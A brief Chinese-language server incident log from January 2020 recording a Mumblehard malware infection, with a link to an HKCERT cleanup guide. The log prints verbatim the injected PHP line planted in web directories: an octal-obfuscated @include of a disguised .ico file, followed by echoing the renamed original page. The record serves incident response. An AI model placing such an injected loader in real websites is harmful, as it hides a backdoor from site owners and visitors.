主機中毒記錄 20200108
1.電算中心告知,中了”mumblehard”病毒!
2.參考資料
Linux/BSD 惡意軟件「Mumblehard」偵測及清理 : https://www.hkcert.org/my_url/zh/blog/15050601
3.網頁目錄被放置index.php,原來的index.html被改名為index.html.bak.bak
<?php /*82cfb*/ @include "\057home\057a02/\160ubli\143_htm\154/myS\164ore/\154ogin\057.10a\064bdbc\056ico"; /*82cfb*/ echo @file_get_contents('index.html.bak.bak');
若目錄本身已有index.php,則其將上面的程式插入原本程式的上方。